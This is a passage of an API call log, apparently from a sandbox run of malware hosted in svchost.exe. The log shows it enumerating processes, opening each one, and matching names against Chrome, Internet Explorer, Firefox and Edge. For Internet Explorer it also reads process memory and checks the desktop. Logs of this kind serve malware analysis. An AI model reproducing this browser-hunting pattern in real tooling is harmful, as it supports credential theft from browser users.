	[0209.489] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0209.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.489] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.489] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0209.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.490] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0209.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3430
	[0209.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.491] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0209.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.491] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.491] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0209.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.492] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.492] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0209.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3434
	[0209.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.493] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0209.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.493] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.493] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0209.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.494] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.494] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0209.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3438
	[0209.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.495] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0209.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.495] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.496] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0209.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.497] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.497] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0209.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x343c
	[0209.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.498] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0209.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.498] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.498] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0209.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.499] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.499] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0209.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3440
	[0209.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.499] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0209.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.500] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.500] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0209.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.501] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.501] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0209.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3444
	[0209.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.502] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0209.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.502] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.503] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0209.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.503] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.504] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0209.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3448
	[0209.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.504] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0209.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.505] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.505] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0209.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.505] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.505] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0209.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x344c
	[0209.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.506] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0209.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.507] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.507] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0209.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.507] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0209.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3450
	[0209.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.508] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0209.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.509] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.509] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0209.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.510] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.510] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0209.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3454
	[0209.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.511] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0209.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.511] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.512] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0209.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.512] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.513] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0209.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3458
	[0209.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.514] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0209.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.514] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.515] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0209.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.515] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.515] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0209.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x345c
	[0209.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.516] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0209.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.517] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.517] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0209.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.518] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.519] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0209.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3460
	[0209.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.519] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0209.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.520] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.520] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0209.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.521] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.521] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3464
	[0209.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.522] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.522] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.522] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.523] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.523] NtQueryInformationProcess (in: ProcessHandle=0x3464, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.523] ReadProcessMemory (in: hProcess=0x3464, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.523] ReadProcessMemory (in: hProcess=0x3464, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.523] ReadProcessMemory (in: hProcess=0x3464, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.523] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.523] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3468
	[0209.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.525] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.525] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.525] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.526] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.526] NtQueryInformationProcess (in: ProcessHandle=0x3468, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.526] ReadProcessMemory (in: hProcess=0x3468, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.526] ReadProcessMemory (in: hProcess=0x3468, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.526] ReadProcessMemory (in: hProcess=0x3468, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.526] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.526] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x346c
	[0209.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.527] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.527] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.528] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.528] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.528] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0209.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3470
	[0209.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.529] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0209.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.529] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.530] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0209.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.530] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.530] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3474
	[0209.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.531] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.531] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.532] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.532] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.532] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.533] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3478
	[0209.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.534] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.534] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.534] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.535] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.535] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0209.535] CloseHandle (hObject=0x188) returned 1
	[0209.535] Sleep (dwMilliseconds=0x64) 
	[0209.639] GetCurrentProcessId () returned 0x110
	[0209.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0209.642] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0209.642] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0209.643] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0209.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x347c
	[0209.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.644] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.644] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.644] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.645] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.645] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3480
	[0209.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.646] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.646] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.646] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.646] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
